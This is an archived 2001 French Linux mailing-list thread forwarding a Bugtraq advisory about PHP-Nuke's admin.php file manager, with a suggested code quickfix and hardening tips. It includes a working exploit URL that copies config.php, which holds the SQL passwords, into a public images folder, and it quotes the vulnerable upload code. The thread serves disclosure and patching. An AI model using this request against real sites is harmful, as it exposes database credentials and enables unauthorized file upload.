[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[linux] PHP Bug
Je suppose que vous lisez tous bugtrack ...
mais savez-vous que
http://127.0.0.1/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdi
r=/images/&userfile=config.php&userfile_name=hacked.txt
http://127.0.0.1/images/hacked.txt and you will see config.php that as
Et linuxbe.org ? Et ben non, eux ils savent configurer un apache, c'est pas
comme moi :) ....
Dominique
Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"
This at least works for PostNuke 0.62. I have not tested the latest PostNuke
0.63 - it may be vulnerable as well...
And btw; if you're not going to use the filemanager, disallow write access
for the webuser (usually nobody or www) to all files/directories below
webroot.
Magnus Skjegstad
----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...
> Explanation
> Do you need sql password?
>
>
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
> t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted just go to
> http://www.server.net/images/hacked.txt and you will see config.php that
as
> everyone knows contain the sql's passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try to dont be a
> SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain you the bug... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
> copy($userfile,$basedir.$wdir.$userfile_name);
> $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
> // This need a rewrite -------------------------------------> OMG! WE
> AGREEEEEEEE lmao
> //include("header.php");
> //GraphicAdmin($hlpfile);
> //html_header();
> //displaydir();
> $wdir2="/";
> chdir($basedir . $wdir2);
> //CloseTable();
> //include("footer.php");
> Header("Location: admin.php?op=FileManager");
> exit;
> }
[ Soyez précis dans vos sujets svp afin de déterminer directement ]
[ le type de demande... ]
[ Pour vous (dés)inscrire, aller sur http://unixtech.be/ml.php ]
[ Archives de la mailing list: http://archives.unixtech.be/linux/ ]
[ http://unixtech.be Contact: listmaster@unixtech.be ]